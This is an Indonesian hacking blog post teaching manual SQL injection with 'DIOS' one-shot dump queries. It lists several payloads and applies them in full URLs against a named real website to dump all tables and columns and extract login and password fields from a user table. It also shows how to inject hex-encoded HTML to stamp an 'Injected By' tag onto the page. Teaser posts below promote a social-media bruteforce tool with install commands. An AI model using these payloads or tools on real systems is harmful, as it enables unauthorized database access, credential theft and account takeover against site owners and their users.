Skip to main content

Sqli Manual With DIOS

squadcyber.org - DIOS (Dump In One Shoot) yang artinya kita bisa Dump / mengeluarkan isi database dengan 1 kali request, pertama kali di perkenalkan oleh Profexer (rdot.org) lalu dikembangkan oleh Dr.z3r0 ,M@dbl00d ,Zen Javanicus (securityidiots.com) ,MakMan ,dan temen2 injector lainnya.


DIOS cheatsheet

Query untuk Dump Semua Tabel dan Kolom


Profexer Query

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Dr.z3r0 Query

(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))


Zen Query

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

m@db100d Query

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))

pilih salah satu Query DIOS

Target :
http://www.icpconcepts.com/produit.php?id=55

step berikut nya order by / group by sprti old method manual sqli .
gw anggap kalian sudah bisa menemukan magic number...
Langsung replace column 21 / magic number nya dengan DIOS query
kita coba dump semua tabel dan kolom ::

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),22,23,24,25,26,27,28,29,30--+


kan kita uda tahu nama tabel dan culumn name ,untuk dump / extrak data bgini ::
kita coba dump dari Tabel "connexion" column "id", "login" ,dan "passwd" ..
/! perhatikan baik2 query yg berubah. /

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(connexion)where(@x:=concat+(@x,0x3c62723e,id,0x203a3a20,login,0x203a3a20,passwd))))x),22,23,24,25,26,27,28,29,30--+


#Nb

kalian bisa modif query nya :D
tambahin tag2 html/ sql function dalam concat()

contoh ::

http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(0x3C666F6E7420636F6C6F723D626C75653E3C623E496E6A6563746564204279205633726C75636869653C2F623E3C2F666F6E743E,0x3c62723e4461746162617365203a3a20,database(),0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e2053796d6c696e6b203a3a20,@@Global.have_symlink,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),22,23,24,25,26,27,28,29,30--+


Tambahan ::
kita bs memasukkan tag2 html pada saat injeksi web..
seperti dll dengan syarat harus di convert dalam hex .lalu depannya dikasih 0x.
bentuk Hex ::
0x3C666F6E7420636F6C6F723D626C75653E3C623E496E6A6563746564204279205633726C75636869653C2F623E3C2F666F6E743E adalah Injected By V3rluchie
Dengan memakai tehnik ini kalian tidak perlu convert nama table, dan skaligus kita bisa tahu semua tabel dan kolom secara bersamaan :)

Tehnik Modern Manual SQLi yg simple dan cepat . Ketika Automatic Tool tdk Mampu , Manual mungkin bisa membantu .

Comments

Popular posts from this blog

Mahasiswa UBSI Serahkan Aplikasi Web 'SISTEM INFORMASI PENGELOLAAN ZIS' kepada LAZISMU Unit Wage

  J akarta, 10 Oktober 2025 - Ismail Hasan Basri , mahasiswa dari Universitas Bina Sarana Informatika (UBSI) , berhasil menyelesaikan proyek tugas akhirnya berupa aplikasi inovatif. Aplikasi yang diberi nama "SISTEM INFORMASI PENGELOLAAN ZIS BERBASIS WEB" ini diserahkan secara resmi kepada LAZISMU (Lembaga Amil Zakat, Infak, dan Sedekah Muhammadiyah) Unit Wage sebagai produk dari skripsinya. Sistem berbasis web ini dirancang untuk memodernisasi dan meningkatkan efisiensi seluruh proses pengelolaan Zakat, Infak, dan Sedekah (ZIS) di LAZISMU Unit Wage. Dengan aplikasi ini, LAZISMU diharapkan dapat melakukan pencatatan, pelaporan, serta transparansi data penerimaan dan penyaluran dana ZIS secara lebih cepat, akurat, dan mudah diakses. Ismail Hasan Basri , mahasiswa Program Studi Sistem Informasi UBSI, menyatakan, "Pengelolaan ZIS yang masih dilakukan secara manual memiliki risiko kesalahan data dan kurang efisien. Aplikasi ini hadir untuk memberikan solusi digital, memas...

Social Media Bruteforce Tool (Facebook, Gmail, Instagram, Twitter)

squadcyber - SocialBox adalah tool yang berfungsi sebagai alat untuk Bruteforce beberapa sosial media seperti Facebook, Gmail, Instagram dan Twitter. Tested On Backbox Linux Ubuntu Kali Linux Cara Install dan Menjalankan SocialBox $ sudo apt-get install git $ sudo git clone https://github.com/TunisianEagles/SocialBox.git $ cd SocialBox $ chmod +x SocialBox.sh $ chmod +x install-sb.sh $ ./install-sb.sh $ ./SocialBox.sh  Contact Contact - Belahsan Ouerghi cara bruteforce wifi cara bruteforce instagram cara bruteforce router cara brute force wordpress cara brute force gmail cara brute force cpanel cara brute force di android cara brute force cara brute force akun gmail cara brute force akun fb cara bruteforce facebook android cara brute force attack cara brute force attack facebook cara brute force android cara hack facebook brute force android cara brute force biss key cara belajar brute force cara buat brute force cara brute force dengan cmd cara brute ...

Cara Mendapatkan Akses Root di Termux Tanpa Root

squadcyber - Di Termux kita dapat melakukan hal apa saja yang kita inginkan untuk melakukan kegiatan hacking, atau sebatas programming, namun adakala nya kita tidak leluasa karena tool yang kita jalankan membutuhkan akses Root sedangkan HandPhone yang kita gunakan untuk menjalankan Termux masih perawan atau belum di root, dengan alasan Me-Root HP dapat menghilangkan garansi HP tersebut, atau kalian yang tidak bisa nge-root HP nya. Maka dari itu, kita mencari alternatif lain agar termux kita dapat menjalankan tool yang membutuhkan hak akses root pada HP kita dengan menginstal Termux Fakeroot di termux kita. Termux Fakeroot bekerja untuk mengelabui system android kita agar system tersebut mendeteksi android kita telah memiliki akses root, padahal tidak. Dengan Fakeroot kita dapat menjalankan tool yang semula nya membutuhkan akses root di Hp kita tanpa susah-susah untuk me-root Hp kita. Tapi Fakeroot ini hanya bekerja sebatas pada termux saja, tidak untuk hal yang lain sepe...